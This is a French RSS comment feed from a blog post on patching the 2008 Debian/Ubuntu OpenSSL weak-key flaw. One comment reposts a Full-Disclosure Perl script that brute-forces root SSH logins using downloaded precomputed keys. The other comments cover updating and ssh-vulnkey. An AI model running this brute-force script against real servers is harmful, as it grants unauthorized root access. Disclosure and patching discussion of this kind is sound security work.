<?xml version="1.0" encoding="UTF-8"?><rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
> <channel><title>Commentaires sur : Corriger la faille OpenSSL dans Debian et Ubuntu</title> <atom:link href="http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/feed" rel="self" type="application/rss+xml" /><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html</link> <description>Upgrade your mind</description> <lastBuildDate>Sat, 26 May 2012 21:52:00 +0000</lastBuildDate> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.2</generator> <atom:link rel="hub" href="http://pubsubhubbub.appspot.com"/><atom:link rel="hub" href="http://superfeedr.com/hubbub"/> <item><title>Par : Blog de Thomas &#187; Les vacances approchent&#8230;</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24730</link> <dc:creator>Blog de Thomas &#187; Les vacances approchent&#8230;</dc:creator> <pubDate>Thu, 22 May 2008 20:19:16 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24730</guid> <description>[...] Hier soir, j&#8217;ai mis à jour mon serveur, pour corriger l&#8217;importante faille de OpenSSL (vu sur le blog de Korben). [...]</description> <content:encoded><![CDATA[<p>[...] Hier soir, j&#8217;ai mis à jour mon serveur, pour corriger l&#8217;importante faille de OpenSSL (vu sur le blog de Korben). [...]</p> ]]></content:encoded> </item> <item><title>Par : 1ace</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24619</link> <dc:creator>1ace</dc:creator> <pubDate>Wed, 21 May 2008 15:47:25 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24619</guid> <description>c&#039;est pas finit !
http://www.ubuntu.com/usn/usn-613-1
cette fois, un apt-get upgrade suffit, et vous met à jours libgnutls13 et openssl-blacklist ;)</description> <content:encoded><![CDATA[<p>c&#8217;est pas finit !<br
/> <a
target="_blank" href="http://www.ubuntu.com/usn/usn-613-1"  rel="nofollow">http://www.ubuntu.com/usn/usn-613-1</a></p><p>cette fois, un apt-get upgrade suffit, et vous met à jours libgnutls13 et openssl-blacklist <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_wink.gif" alt="" /></p> ]]></content:encoded> </item> <item><title>Par : Murphy</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24477</link> <dc:creator>Murphy</dc:creator> <pubDate>Mon, 19 May 2008 13:27:52 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24477</guid> <description>Je sais bien qu&#039;il ne faut jamais &quot;nourrir&quot; un troll, mais tout de même :
@bob (&quot;Les systèmes libreS, de vraiS gruyèreS.&quot;)
Ça tombe bien pour Linux, le gruyère n&#039;a pas de trou, c&#039;est l&#039;emmental qui en a :p</description> <content:encoded><![CDATA[<p>Je sais bien qu&#8217;il ne faut jamais &laquo;&nbsp;nourrir&nbsp;&raquo; un troll, mais tout de même :</p><p>@bob (&laquo;&nbsp;Les systèmes libreS, de vraiS gruyèreS.&nbsp;&raquo<img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_wink.gif" alt="" /><br
/> Ça tombe bien pour Linux, le gruyère n&#8217;a pas de trou, c&#8217;est l&#8217;emmental qui en a :p</p> ]]></content:encoded> </item> <item><title>Par : 1ace</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24220</link> <dc:creator>1ace</dc:creator> <pubDate>Fri, 16 May 2008 16:08:41 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24220</guid> <description>euh... les &lt;img&gt; sont supprimées après la période d&#039;édition... normal ?
heureusement que j&#039;avais mis le lien ^^</description> <content:encoded><![CDATA[<p>euh&#8230; les &lt;img&gt; sont supprimées après la période d&#8217;édition&#8230; normal ?<br
/> heureusement que j&#8217;avais mis le lien ^^</p> ]]></content:encoded> </item> <item><title>Par : 1ace</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24214</link> <dc:creator>1ace</dc:creator> <pubDate>Fri, 16 May 2008 15:31:57 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24214</guid> <description>Même XKCD a &lt;a href=&quot;http://xkcd.com/424&quot; rel=&quot;nofollow&quot;&gt;sortit une planche&lt;/a&gt; pour l&#039;occaz&#039; ^^
&lt;i&gt;True story: I had to try several times to upload this comic because my ssh key was blacklisted.&lt;/i&gt;
L&#039;occasion de resortir le bon vieux “Trust is a weakness” ?
(&lt;i&gt;ceux qui ne connaissent pas devraient avoir honte ^^&lt;/i&gt;)</description> <content:encoded><![CDATA[<p>Même XKCD a <a
target="_blank" href="http://xkcd.com/424"  rel="nofollow">sortit une planche</a> pour l&#8217;occaz&#8217; ^^</p><p><i>True story: I had to try several times to upload this comic because my ssh key was blacklisted.</i></p><p>L&#8217;occasion de resortir le bon vieux “Trust is a weakness” ?<br
/> (<i>ceux qui ne connaissent pas devraient avoir honte ^^</i>)</p> ]]></content:encoded> </item> <item><title>Par : Angelarme</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24148</link> <dc:creator>Angelarme</dc:creator> <pubDate>Fri, 16 May 2008 00:40:51 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24148</guid> <description>...ou BSD, ou Slackware, ou...
! Ceci dit, les clés générées avec GnuPG ou GNUTLS ne sont pas touchées :
http://lists.debian.org/debian-security-announce/2008/msg00152.html
http://wiki.debian.org/SSLkeys</description> <content:encoded><![CDATA[<p>&#8230;ou BSD, ou Slackware, ou&#8230;</p><p>! Ceci dit, les clés générées avec GnuPG ou GNUTLS ne sont pas touchées :</p><p><a
target="_blank" href="http://lists.debian.org/debian-security-announce/2008/msg00152.html"  rel="nofollow">http://lists.debian.org/debian-security-announce/2008/msg00152.html</a></p><p><a
target="_blank" href="http://wiki.debian.org/SSLkeys"  rel="nofollow">http://wiki.debian.org/SSLkeys</a></p> ]]></content:encoded> </item> <item><title>Par : lirva</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24139</link> <dc:creator>lirva</dc:creator> <pubDate>Thu, 15 May 2008 21:43:00 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24139</guid> <description>migrez vers fedora 9 qui vient de sortir
http://fedoraproject.org ;)</description> <content:encoded><![CDATA[<p>migrez vers fedora 9 qui vient de sortir<br
/> <a
target="_blank" href="http://fedoraproject.org"  rel="nofollow">http://fedoraproject.org</a> <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_wink.gif" alt="" /></p> ]]></content:encoded> </item> <item><title>Par : Random</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24138</link> <dc:creator>Random</dc:creator> <pubDate>Thu, 15 May 2008 21:30:26 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24138</guid> <description>Good to Know !!!!
Merci Obibi
Pouet !</description> <content:encoded><![CDATA[<p>Good to Know !!!!</p><p>Merci Obibi</p><p>Pouet !</p> ]]></content:encoded> </item> <item><title>Par : 1ace</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24127</link> <dc:creator>1ace</dc:creator> <pubDate>Thu, 15 May 2008 20:26:11 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24127</guid> <description>merci pour le poc :D
mais c&#039;est vrai que c&#039;est pas terrible de se baser sur le pid pour générer la clé... je sais pas à quoi ils pensaient quand ils ont fait ça ^^
Edit:  arghl !  75Mo pour un POC... ils y vont pas de main morte :roll:</description> <content:encoded><![CDATA[<p>merci pour le poc <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_biggrin.gif" alt="" /></p><p>mais c&#8217;est vrai que c&#8217;est pas terrible de se baser sur le pid pour générer la clé&#8230; je sais pas à quoi ils pensaient quand ils ont fait ça ^^</p><p>Edit:  arghl !  75Mo pour un POC&#8230; ils y vont pas de main morte <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_rolleyes.gif" alt="" /></p> ]]></content:encoded> </item> <item><title>Par : Korben</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24122</link> <dc:creator>Korben</dc:creator> <pubDate>Thu, 15 May 2008 20:11:51 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24122</guid> <description>Hi full-disclosure,
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn&#039;t need to be debian, do the following:
1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print &quot;Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n&quot;;
print &quot;Example: ./exploiter.pl /root/keys/ 127.0.0.1\n&quot;;
print &quot;By mm@deadbeef.de\n&quot;;
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) &#124;&#124; die(&quot;opendir&quot;);
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) &gt; $keysPerConnect) {
system(&quot;echo &quot;.join(&quot; &quot;, @a).&quot;; ssh -l root &quot;.join(&quot; &quot;, map { &quot;-i
&quot;.$_ } @a).&quot; &quot;.$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/</description> <content:encoded><![CDATA[<p>Hi full-disclosure,</p><p>the debian openssl issue leads that there are only 65.536 possible ssh<br
/> keys generated, cause the only entropy is the pid of the process<br
/> generating the key.</p><p>This leads to that the following perl script can be used with the<br
/> precalculated ssh keys to brute force the ssh login. It works if such a<br
/> keys is installed on a non-patched debian or any other system manual<br
/> configured to.</p><p>On an unpatched system, which doesn&#8217;t need to be debian, do the following:</p><p>1. Download <a
target="_blank" href="http://www.deadbeef.de/rsa.2048.tar.bzip2"  rel="nofollow">http://www.deadbeef.de/rsa.2048.tar.bzip2</a></p><p>2. Extract it to a directory</p><p>3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048<br
/> Bits, generated on an upatched debian (this is the key this exploit will<br
/> break)</p><p>4. Run the perl script and give it the location to where you extracted<br
/> the bzip2 mentioned.</p><p>#!/usr/bin/perl<br
/> my $keysPerConnect = 6;<br
/> unless ($ARGV[1]) {<br
/> print &laquo;&nbsp;Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n&nbsp;&raquo;;<br
/> print &laquo;&nbsp;Example: ./exploiter.pl /root/keys/ 127.0.0.1\n&nbsp;&raquo;;<br
/> print &laquo;&nbsp;By <a
href="mailto:mm@deadbeef.de">mm@deadbeef.de</a>\n&nbsp;&raquo;;<br
/> exit 0;<br
/> }<br
/> chdir($ARGV[0]);<br
/> opendir(A, $ARGV[0]) || die(&laquo;&nbsp;opendir&nbsp;&raquo<img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_wink.gif" alt="" />;<br
/> while ($_ = readdir(A)) {<br
/> chomp;<br
/> next unless m,^\d+$,;<br
/> push(@a, $_);<br
/> if (scalar(@a) > $keysPerConnect) {<br
/> system(&laquo;&nbsp;echo &laquo;&nbsp;.join(&nbsp;&raquo; &laquo;&nbsp;, @a).&nbsp;&raquo;; ssh -l root &laquo;&nbsp;.join(&nbsp;&raquo; &laquo;&nbsp;, map { &laquo;&nbsp;-i<br
/> &laquo;&nbsp;.$_ } @a).&nbsp;&raquo; &laquo;&nbsp;.$ARGV[1]);<br
/> @a = ();<br
/> }<br
/> }</p><p>5. Enjoy the shell after some minutes (less than 20 minutes)</p><p>Regards,<br
/> Markus Mueller<br
/> <a
href="mailto:mm@deadbeef.de">mm@deadbeef.de</a></p><p>_______________________________________________<br
/> Full-Disclosure &#8211; We believe in it.<br
/> Charter: <a
target="_blank" href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">http://lists.grok.org.uk/full-disclosure-charter.html</a><br
/> Hosted and sponsored by Secunia &#8211; <a
target="_blank" href="http://secunia.com/"  rel="nofollow">http://secunia.com/</a></p> ]]></content:encoded> </item> <item><title>Par : Korben</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24121</link> <dc:creator>Korben</dc:creator> <pubDate>Thu, 15 May 2008 20:11:19 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24121</guid> <description>@&lt;a href=&quot;#comment-24120&quot; rel=&quot;nofollow&quot;&gt;Bristow&lt;/a&gt;: j&#039;ai eu ça aussi sur certaines clés et ça roule... Quoiqu&#039;il en soit, faut mettre à jour...</description> <content:encoded><![CDATA[<p>@<a
href="#comment-24120" rel="nofollow">Bristow</a>: j&#8217;ai eu ça aussi sur certaines clés et ça roule&#8230; Quoiqu&#8217;il en soit, faut mettre à jour&#8230;</p> ]]></content:encoded> </item> <item><title>Par : Bristow</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24120</link> <dc:creator>Bristow</dc:creator> <pubDate>Thu, 15 May 2008 20:08:37 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24120</guid> <description>@Korben : celle-ci sudo ssh-vulnkey -a
Comprend pas, il ne met qu&#039;unknow puis : 2048 xxxxxxxxxxxxxxx /chemin/vers/laclé.pub
On verra si j&#039;arrive à me connecter aux serveurs...</description> <content:encoded><![CDATA[<p>@Korben : celle-ci sudo ssh-vulnkey -a</p><p>Comprend pas, il ne met qu&#8217;unknow puis : 2048 xxxxxxxxxxxxxxx /chemin/vers/laclé.pub</p><p>On verra si j&#8217;arrive à me connecter aux serveurs&#8230;</p> ]]></content:encoded> </item> <item><title>Par : Korben</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24060</link> <dc:creator>Korben</dc:creator> <pubDate>Thu, 15 May 2008 15:46:41 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24060</guid> <description>@&lt;a href=&quot;#comment-24054&quot; rel=&quot;nofollow&quot;&gt;1ace&lt;/a&gt;: Ah cool ! Moi pas encore reçu les CDs ! Sinon, good news, je vais bientot passer en Ubuntu + Virtualbox WinXP sur le PC Portable du boulot :-)</description> <content:encoded><![CDATA[<p>@<a
href="#comment-24054" rel="nofollow">1ace</a>: Ah cool ! Moi pas encore reçu les CDs ! Sinon, good news, je vais bientot passer en Ubuntu + Virtualbox WinXP sur le PC Portable du boulot <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_smile.gif" alt="" /></p> ]]></content:encoded> </item> <item><title>Par : 1ace</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24054</link> <dc:creator>1ace</dc:creator> <pubDate>Thu, 15 May 2008 15:35:26 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24054</guid> <description>@&lt;a href=&quot;#comment-24052&quot; rel=&quot;nofollow&quot;&gt;Korben&lt;/a&gt;: oui, j&#039;ai bien vu qu&#039;il n&#039;a pas fait la maj ^^
mais je n&#039;avais effectivement pas fait un dist-upgrade mais un upgrade, et j&#039;avais pas remarqué que tu proposait un dist-upgrade... mea culpa ;)
Edit:  ça marche :D
merci Korben, t&#039;es le meilleur ^^
PS:  je viens de recevoir mes CD de Ubuntu 8.04 :D</description> <content:encoded><![CDATA[<p>@<a
href="#comment-24052" rel="nofollow">Korben</a>: oui, j&#8217;ai bien vu qu&#8217;il n&#8217;a pas fait la maj ^^</p><p>mais je n&#8217;avais effectivement pas fait un dist-upgrade mais un upgrade, et j&#8217;avais pas remarqué que tu proposait un dist-upgrade&#8230; mea culpa <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_wink.gif" alt="" /></p><p>Edit:  ça marche <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_biggrin.gif" alt="" /><br
/> merci Korben, t&#8217;es le meilleur ^^</p><p>PS:  je viens de recevoir mes CD de Ubuntu 8.04 <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_biggrin.gif" alt="" /></p> ]]></content:encoded> </item> <item><title>Par : Korben</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24053</link> <dc:creator>Korben</dc:creator> <pubDate>Thu, 15 May 2008 15:33:31 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24053</guid> <description>@&lt;a href=&quot;#comment-24051&quot; rel=&quot;nofollow&quot;&gt;Bristow&lt;/a&gt;: De quelle commande tu parles ?</description> <content:encoded><![CDATA[<p>@<a
href="#comment-24051" rel="nofollow">Bristow</a>: De quelle commande tu parles ?</p> ]]></content:encoded> </item> <item><title>Par : Korben</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24052</link> <dc:creator>Korben</dc:creator> <pubDate>Thu, 15 May 2008 15:28:24 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24052</guid> <description>@&lt;a href=&quot;#comment-24049&quot; rel=&quot;nofollow&quot;&gt;1ace&lt;/a&gt;: T&#039;es sur que tu as fait un dist-upgrade ? Car là il n&#039;a pas fait la mise à jour ton truc</description> <content:encoded><![CDATA[<p>@<a
href="#comment-24049" rel="nofollow">1ace</a>: T&#8217;es sur que tu as fait un dist-upgrade ? Car là il n&#8217;a pas fait la mise à jour ton truc</p> ]]></content:encoded> </item> <item><title>Par : Bristow</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24051</link> <dc:creator>Bristow</dc:creator> <pubDate>Thu, 15 May 2008 15:22:51 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24051</guid> <description>Le résultat de la commande : unknow... et je fais quoi avec çà ?</description> <content:encoded><![CDATA[<p>Le résultat de la commande : unknow&#8230; et je fais quoi avec çà ?</p> ]]></content:encoded> </item> <item><title>Par : 1ace</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24049</link> <dc:creator>1ace</dc:creator> <pubDate>Thu, 15 May 2008 15:12:26 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24049</guid> <description>j&#039;ai aussi vu passer cette faille (abonne-toi à &lt;a href=&quot;http://www.ubuntu.com/rss.xml&quot; rel=&quot;nofollow&quot;&gt;ce flux RSS&lt;/a&gt;, c&#039;est très intéressant ;))
par contre, là où je suis emmerdé, c&#039;est que mon seul accès vers le serveur est en ssh, donc je me retrouve avec ce beau message:
&lt;blockquote&gt;The following packages have been kept back:
openssh-client openssh-server ssl-cert
0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.&lt;/blockquote&gt;
une idée peut-être ?
sinon, la commande ssh-vulnkey n&#039;existe pas chez moi... il faut un package supplémentaire ?</description> <content:encoded><![CDATA[<p>j&#8217;ai aussi vu passer cette faille (abonne-toi à <a
target="_blank" href="http://www.ubuntu.com/rss.xml"  rel="nofollow">ce flux RSS</a>, c&#8217;est très intéressant <img
src="http://korben.info/wp-content/plugins/wp-smiley-switcher/yellowpack/icon_wink.gif" alt="" />)</p><p>par contre, là où je suis emmerdé, c&#8217;est que mon seul accès vers le serveur est en ssh, donc je me retrouve avec ce beau message:</p><blockquote><p>The following packages have been kept back:<br
/> openssh-client openssh-server ssl-cert<br
/> 0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.</p></blockquote><p>une idée peut-être ?</p><p>sinon, la commande ssh-vulnkey n&#8217;existe pas chez moi&#8230; il faut un package supplémentaire ?</p> ]]></content:encoded> </item> <item><title>Par : Korben</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24038</link> <dc:creator>Korben</dc:creator> <pubDate>Thu, 15 May 2008 14:36:56 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24038</guid> <description>Je viens d&#039;ailleurs de mettre à jour 3 dedibox, 2 PC Desktop Ubuntu et 1 Serveur Debian ! Et j&#039;ai rien cassé !
Conclusion : Dieu existe !</description> <content:encoded><![CDATA[<p>Je viens d&#8217;ailleurs de mettre à jour 3 dedibox, 2 PC Desktop Ubuntu et 1 Serveur Debian ! Et j&#8217;ai rien cassé !</p><p>Conclusion : Dieu existe !</p> ]]></content:encoded> </item> <item><title>Par : Korben</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24033</link> <dc:creator>Korben</dc:creator> <pubDate>Thu, 15 May 2008 14:29:16 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24033</guid> <description>@&lt;a href=&quot;#comment-24029&quot; rel=&quot;nofollow&quot;&gt;bob&lt;/a&gt;: MDr ! Vrai ! Avec du code fermé comme chez Microsoft, au moins les pirates ne sont pas prêt de trouver les failles... héhé...
-&gt; humour !</description> <content:encoded><![CDATA[<p>@<a
href="#comment-24029" rel="nofollow">bob</a>: MDr ! Vrai ! Avec du code fermé comme chez Microsoft, au moins les pirates ne sont pas prêt de trouver les failles&#8230; héhé&#8230;</p><p>-> humour !</p> ]]></content:encoded> </item> <item><title>Par : bob</title><link>http://korben.info/corriger-la-faille-openssl-dans-debian-et-ubuntu.html/comment-page-1#comment-24029</link> <dc:creator>bob</dc:creator> <pubDate>Thu, 15 May 2008 14:15:06 +0000</pubDate> <guid
isPermaLink="false">http://www.korben.info/?p=4184#comment-24029</guid> <description>Les systèmes libre, de vrai gruyère.
Heureusement, personne s&#039;en sert, sinon ce serait un beau bordel.</description> <content:encoded><![CDATA[<p>Les systèmes libre, de vrai gruyère.</p><p>Heureusement, personne s&#8217;en sert, sinon ce serait un beau bordel.</p> ]]></content:encoded> </item> </channel> </rss>
